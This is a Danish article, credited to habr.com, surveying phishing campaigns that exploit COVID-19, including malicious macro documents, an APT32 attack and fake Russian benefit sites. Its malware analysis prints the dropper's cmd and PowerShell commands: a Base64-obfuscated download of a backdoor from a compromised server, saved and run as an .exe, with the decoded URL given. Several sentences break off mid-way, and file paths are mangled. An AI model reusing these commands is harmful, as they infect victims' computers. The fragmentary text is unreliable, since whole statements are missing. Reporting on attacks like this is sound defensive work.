Angribere fortsætter med at udnytte COVID-19-emnet og skaber flere og flere trusler for brugere, der er meget interesserede i alt relateret til epidemien. I
Husk i
Vil du have en gratis test for COVID-19?
Et andet væsentligt eksempel på phishing med coronavirus-tema var
Det var også nemt at overbevise de fleste brugere om at aktivere makroer. For at gøre dette blev der brugt et standardtrick: For at udfylde spørgeskemaet skal du først aktivere makroer, hvilket betyder, at du skal køre et VBA-script.
Som du kan se, er VBA-scriptet specielt maskeret fra antivirus.
Windows har en ventefunktion, hvor applikationen venter /T <sekunder>, før den accepterer standardsvaret "Ja". I vores tilfælde ventede scriptet 65 sekunder, før de slettede midlertidige filer:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Og mens man ventede, blev malware downloadet. Et særligt PowerShell-script blev lanceret til dette:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Efter afkodning af Base64-værdien downloader PowerShell-scriptet bagdøren på den tidligere hackede webserver fra Tyskland:
http://automatischer-staubsauger.com/feature/777777.png
og gemmer det under navnet:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’
slettes, når du kører 'tmps1.bat'-filen, der indeholder kommandoen cmd /c mkdir ""C:UsersPublictmpdir"".
Målrettet angreb på offentlige myndigheder
Derudover rapporterede FireEye-analytikere for nylig om et målrettet APT32-angreb rettet mod regeringsstrukturer i Wuhan, såvel som det kinesiske ministerium for beredskab. En af de distribuerede RTF'er indeholdt et link til en artikel i New York Times med titlen
Interessant nok opdagede ingen af antivirusserne denne instans på detektionstidspunktet, ifølge Virustotal.
Når officielle hjemmesider er nede
Det mest slående eksempel på et phishing-angreb fandt sted i Rusland forleden dag. Årsagen hertil var udpegelsen af en længe ventet ydelse til børn i alderen 3 til 16 år. Da starten på at acceptere ansøgninger blev annonceret den 12. maj 2020, skyndte millioner sig til statstjenestens websted for den længe ventede hjælp og bragte portalen ned, der ikke var værre end et professionelt DDoS-angreb. Da præsidenten sagde, at "Statens tjenester ikke kunne klare strømmen af ansøgninger", begyndte folk at tale online om lanceringen af et alternativt websted til at acceptere ansøgninger.
Problemet er, at flere websteder begyndte at arbejde på én gang, og mens en, den rigtige på posobie16.gosuslugi.ru, faktisk accepterer ansøgninger, mere
Kolleger fra SearchInform fandt omkring 30 nye svigagtige domæner i .ru-zonen. Infosecurity og Softline Company har sporet mere end 70 lignende falske offentlige servicewebsteder siden begyndelsen af april. Deres skabere manipulerer velkendte symboler og bruger også kombinationer af ordene gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie og så videre.
Hype og social engineering
Alle disse eksempler bekræfter kun, at angribere med succes tjener penge på emnet coronavirus. Og jo højere den sociale spænding er og jo mere uklare spørgsmål, jo større chancer har svindlere for at stjæle vigtige data, tvinge folk til at opgive deres penge på egen hånd eller simpelthen hacke flere computere.
Og i betragtning af at pandemien har tvunget potentielt uforberedte mennesker til at arbejde hjemmefra i massevis, er ikke kun personlige, men også virksomhedsdata i fare. For eksempel blev brugere af Microsoft 365 (tidligere Office 365) for nylig også udsat for et phishing-angreb. Folk modtog massive "misste" talebeskeder som vedhæftede filer til breve. Filerne var dog faktisk en HTML-side, som sendte ofre for angrebet til
Kilde: www.habr.com